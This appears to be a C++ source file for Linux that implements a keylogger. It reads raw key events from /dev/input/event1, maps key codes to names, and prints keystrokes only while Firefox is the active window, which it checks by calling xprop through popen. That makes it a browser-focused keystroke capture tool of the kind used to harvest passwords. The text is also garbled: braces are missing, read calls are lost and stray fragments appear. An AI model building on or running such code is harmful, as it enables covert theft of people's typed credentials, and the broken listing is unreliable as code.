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Created December 18, 2017 09:02
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#include <iostream>
#include <fstream>
#include <cstring>
#include <linux/input.h>
using namespace std;
#include <string>
#include <iostream>
#include <stdio.h>
using namespace std;
std::string exec(char *cmd) {
FILE *pipe = popen(cmd, "r");
if (!pipe) return "ERROR";
char buffer[128];
std::string result = "";
while(!feof(pipe)) {
if(fgets(buffer, 128, pipe) != NULL)
result += buffer;
return result;
std::string toChar(int value)
case 1: return "ESC";
case 59: return "F1";
case 60: return "F2";
case 61: return "F3";
case 62: return "F4";
case 63: return "F5";
case 64: return "F6";
case 65: return "F7";
case 66: return "F8";
case 67: return "F9";
case 68: return "F10";
case 87: return "F11";
case 88: return "F12";
case 99: return "PRT SCREEN";
case 110: return "INSERT";
case 111: return "DELETE";
case 104: return "PG UP";
case 109: return "PG DOWN";
case 102: return "HOME";
case 107: return "END";
case 41: return "`";
case 2: return "1 LEFT";
case 3: return "2 LEFT";
case 4: return "3 LEFT";
case 5: return "4 LEFT";
case 6: return "5 LEFT";
case 7: return "6 LEFT";
case 8: return "7 LEFT";
case 9: return "8 LEFT";
case 10: return "9 LEFT";
case 11: return "0 LEFT";
case 12: return "- LEFT";
case 13: return "=";
case 14: return "BACKSPACE";
case 69: return "NUMLOCK";
case 98: return "/";
case 55: return "*";
case 74: return "- RIGHT";
case 15: return "TAB";
case 16: return "q";
case 17: return "w";
case 18: return "e";
case 19: return "r";
case 20: return "t";
case 21: return "y";
case 22: return "u";
case 23: return "i";
case 24: return "o";
case 25: return "p";
case 26: return "{";
case 27: return "}";
case 43: return "\\";
case 71: return "7 RIGHT";
case 72: return "8 RIGHT";
case 73: return "9 RIGHT";
case 78: return "+";
case 58: return "CAPLOCK ON";
case 30: return "a";
case 31: return "s";
case 32: return "d";
case 33: return "f";
case 34: return "g";
case 35: return "h";
case 36: return "j";
case 37: return "k";
case 38: return "l";
case 39: return ";";
case 40: return "'";
case 28: return "LEFT ENTER";
case 75: return "4 RIGHT";
case 76: return "5 RIGHT";
case 77: return "6 RIGHT";
case 42: return "LEFT SHIFT";
case 44: return "z";
case 45: return "x";
case 46: return "c";
case 47: return "v";
case 48: return "b";
case 49: return "n";
case 50: return "m";
case 51: return ",";
case 52: return ". LEFT";
case 53: return "/";
case 54: return "RIGHT SHIFT";
case 79: return "1 RIGHT";
case 80: return "2 RIGHT";
case 81: return "3 RIGHT";
case 96: return "RIGHT ENTER";
case 29: return "RIGHT CTRL";
case 125: return "WINDOWS";
case 56: return "LEFT ALT";
case 57: return "SPACE";
case 100: return "RIGHT ALT";
case 97: return "LEFT CTRL";
case 105: return "LEFT ARROW";
case 108: return "DOWN ARROW";
case 106: return "RIGHT ARROW";
case 103: return "UP ARROW";
case 82: return "0";
case 83: return ". RIGHT";
int check(std::string name)
std::string::size_type t = name.find("Firefox");
if ( t == std::string::npos )
return 0;
return 1;
//structure to hold event info
struct input_event event;
int main(int argc, char *argv[]) {
cout << "Receiving Keyboard Presses!" << endl;
//open the file for reading
ifstream file("/dev/input/event1");//where input from keyboard store
//temp storage for event
char data[sizeof(event)];
//check if file opened!
// xprop -id <window_id> to get window_name
string win_name = exec("xprop -id $(xprop -root | awk '/_NET_ACTIVE_WINDOW\\(WINDOW\\)/{print $NF}') | awk '/WM_CLASS\\(STRING\\)/{print $4}'").c_str();
while ( true )
std::string win_name = exec("xprop -id $(xprop -root | awk '/_NET_ACTIVE_WINDOW\\(WINDOW\\)/{print $NF}') | awk '/WM_CLASS\\(STRING\\)/{print $4}'").c_str();
while( check(win_name) == 1 )
{, sizeof(event));
//now copy the data to the struct
memcpy(&event, data, sizeof(event));
//now lets read the event
//event type
if(event.type == EV_KEY)
cout << "Key Press " << toChar(event.code) << endl;
win_name = exec("xprop -id $(xprop -root | awk '/_NET_ACTIVE_WINDOW\\(WINDOW\\)/{print $NF}') | awk '/WM_CLASS\\(STRING\\)/{print $4}'").c_str();
}, sizeof(event));
//now copy the data to the struct
memcpy(&event, data, sizeof(event));
//dont forget to close the file
else {
cout << "Unable to open file!" << endl;
return 1;
return 0;
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